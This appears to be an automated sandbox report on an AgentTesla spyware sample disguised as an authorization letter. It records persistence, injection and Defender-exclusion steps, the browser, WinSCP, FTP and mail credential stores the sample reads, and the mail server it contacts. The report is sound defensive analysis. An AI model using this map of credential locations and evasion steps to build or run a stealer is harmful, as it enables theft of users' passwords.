                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeQueries volume information: C:\Users\user\AppData\Roaming\tIFjYTCo.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\Desktop\autorization Letter.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 1.2.autorization Letter.exe.44ec5b8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.autorization Letter.exe.44b1598.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.autorization Letter.exe.44b1598.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.3346316308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2202666103.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2204151615.000000000288A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.3346316308.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2204151615.0000000002882000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2160081111.0000000004429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.3346316308.000000000282C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2204151615.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: autorization Letter.exe PID: 6180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1576, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6540, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 1.2.autorization Letter.exe.44ec5b8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.autorization Letter.exe.44b1598.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.autorization Letter.exe.44b1598.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.2202666103.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2160081111.0000000004429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.3346316308.000000000282C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2204151615.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: autorization Letter.exe PID: 6180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1576, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6540, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 1.2.autorization Letter.exe.44ec5b8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.autorization Letter.exe.44b1598.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.autorization Letter.exe.44b1598.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.3346316308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2202666103.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2204151615.000000000288A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.3346316308.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2204151615.0000000002882000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2160081111.0000000004429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.3346316308.000000000282C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2204151615.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: autorization Letter.exe PID: 6180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1576, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6540, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		311
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		1
                      Non-Application Layer Protocol                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Registry Run Keys / Startup Folder                      		1
                      Scheduled Task/Job                      		2
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		211
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Registry Run Keys / Startup Folder                      		12
                      Software Packing                      		NTDS1
                      Process Discovery                      		Distributed Component Object Model1
                      Input Capture                      		Protocol ImpersonationTraffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Timestomp                      		LSA Secrets141
                      Virtualization/Sandbox Evasion                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Masquerading                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                      Virtualization/Sandbox Evasion                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
                      Process Injection                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Hidden Files and Directories                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519119 Sample: autorization Letter.exe Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 57 mail.unitechautomations.com 2->57 61 Suricata IDS alerts for network traffic 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 11 other signatures 2->67 8 autorization Letter.exe 7 2->8         started        12 tIFjYTCo.exe 5 2->12         started        14 GUIVTme.exe 2->14         started        16 GUIVTme.exe 2->16         started        signatures3 process4 file5 49 C:\Users\user\AppData\Roaming\tIFjYTCo.exe, PE32 8->49 dropped 51 C:\Users\...\tIFjYTCo.exe:Zone.Identifier, ASCII 8->51 dropped 53 C:\Users\user\AppData\Local\...\tmpF639.tmp, XML 8->53 dropped 55 C:\Users\user\...\autorization Letter.exe.log, ASCII 8->55 dropped 83 Writes to foreign memory regions 8->83 85 Allocates memory in foreign processes 8->85 87 Adds a directory exclusion to Windows Defender 8->87 89 Injects a PE file into a foreign processes 8->89 18 RegSvcs.exe 1 4 8->18         started        23 powershell.exe 23 8->23         started        25 powershell.exe 23 8->25         started        27 schtasks.exe 1 8->27         started        91 Multi AV Scanner detection for dropped file 12->91 93 Machine Learning detection for dropped file 12->93 29 RegSvcs.exe 12->29         started        31 schtasks.exe 12->31         started        33 conhost.exe 14->33         started        35 conhost.exe 16->35         started        signatures6 process7 dnsIp8 59 mail.unitechautomations.com 192.185.129.60, 49711, 49712, 587 UNIFIEDLAYER-AS-1US United States 18->59 47 C:\Users\user\AppData\Roaming\...behaviorgraphUIVTme.exe, PE32 18->47 dropped 69 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->69 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->71 73 Loading BitLocker PowerShell Module 23->73 37 conhost.exe 23->37         started        39 WmiPrvSE.exe 23->39         started        41 conhost.exe 25->41         started        43 conhost.exe 27->43         started        75 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 29->75 77 Tries to steal Mail credentials (via file / registry access) 29->77 79 Tries to harvest and steal ftp login credentials 29->79 81 Tries to harvest and steal browser information (history, passwords, etc) 29->81 45 conhost.exe 31->45         started        file9 signatures10 process11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      autorization Letter.exe58%ReversingLabsByteCode-MSIL.Spyware.Negasteal
                      autorization Letter.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\tIFjYTCo.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe0%ReversingLabs
                      C:\Users\user\AppData\Roaming\tIFjYTCo.exe58%ReversingLabsByteCode-MSIL.Spyware.Negasteal

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://account.dyn.com/0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      http://mail.unitechautomations.com0%Avira URL Cloudsafe
                      https://www.chiark.greenend.org.uk/~sgtatham/putty/00%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.unitechautomations.com
                      		192.185.129.60
                      		truetrue
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://mail.unitechautomations.comRegSvcs.exe, 00000009.00000002.2204151615.000000000288A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3346316308.0000000002899000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://account.dyn.com/autorization Letter.exe, 00000001.00000002.2160081111.0000000004429000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2202666103.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameautorization Letter.exe, 00000001.00000002.2159567789.0000000003475000.00000004.00000800.00020000.00000000.sdmp, tIFjYTCo.exe, 0000000A.00000002.2225613849.000000000272A000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.chiark.greenend.org.uk/~sgtatham/putty/0autorization Letter.exe, tIFjYTCo.exe.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        192.185.129.60
                        		mail.unitechautomations.comUnited States
                        		46606UNIFIEDLAYER-AS-1UStrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1519119
                        Start date and time:2024-09-26 07:02:10 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 7m 30s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:22
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:autorization Letter.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@23/19@1/1
                        EGA Information:
                        • Successful, ratio: 66.7%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 288
                        • Number of non-executed functions: 12
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target GUIVTme.exe, PID 5332 because it is empty
                        • Execution Graph export aborted for target GUIVTme.exe, PID 5744 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: autorization Letter.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        01:03:04API Interceptor1x Sleep call for process: autorization Letter.exe modified
                        01:03:09API Interceptor32x Sleep call for process: powershell.exe modified
                        01:03:10API Interceptor45x Sleep call for process: RegSvcs.exe modified
                        01:03:12API Interceptor1x Sleep call for process: tIFjYTCo.exe modified
                        07:03:09Task SchedulerRun new task: tIFjYTCo path: C:\Users\user\AppData\Roaming\tIFjYTCo.exe
                        07:03:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run GUIVTme C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                        07:03:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run GUIVTme C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        192.185.129.60DAZZILING- ASIA PO.NO4678754.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          Payment Copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            8b1ddf6861f6e9fdd05b7e279bf0e218c41946b5162dc12d7da5cb628c98db27_dump.exeGet hashmaliciousAgentTeslaBrowse
                              ISS GLOBAL FORWARDING UAE LLC.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                Invoice Checklist.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  Total Invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    CREDIT NOTE.exeGet hashmaliciousAgentTeslaBrowse
                                      Total Invoices.exeGet hashmaliciousAgentTeslaBrowse
                                        CAHKHCM2404009CFS.exeGet hashmaliciousAgentTeslaBrowse
                                          Booking_BK24-000288_19_Apr_2410_52_34 AM.exeGet hashmaliciousAgentTeslaBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            mail.unitechautomations.comDAZZILING- ASIA PO.NO4678754.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 192.185.129.60
                                            Payment Copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 192.185.129.60
                                            8b1ddf6861f6e9fdd05b7e279bf0e218c41946b5162dc12d7da5cb628c98db27_dump.exeGet hashmaliciousAgentTeslaBrowse
                                            • 192.185.129.60
                                            ISS GLOBAL FORWARDING UAE LLC.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 192.185.129.60
                                            Invoice Checklist.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 192.185.129.60
                                            Total Invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 192.185.129.60
                                            CREDIT NOTE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 192.185.129.60
                                            Total Invoices.exeGet hashmaliciousAgentTeslaBrowse
                                            • 192.185.129.60
                                            CAHKHCM2404009CFS.exeGet hashmaliciousAgentTeslaBrowse
                                            • 192.185.129.60
                                            Booking_BK24-000288_19_Apr_2410_52_34 AM.exeGet hashmaliciousAgentTeslaBrowse
                                            • 192.185.129.60

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            UNIFIEDLAYER-AS-1UShttp://www.richfieldkennel.com/SharePointProposalFile/Get hashmaliciousHTMLPhisherBrowse
                                            • 192.185.102.120
                                            https://putefix.dogfriendlytahoe.com/Get hashmaliciousUnknownBrowse
                                            • 192.185.24.110
                                            https://albertanewsprint.dogfriendlytahoe.com/Get hashmaliciousUnknownBrowse
                                            • 192.185.24.110
                                            INDIA - VSL PARTICULARS.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            • 50.87.144.157
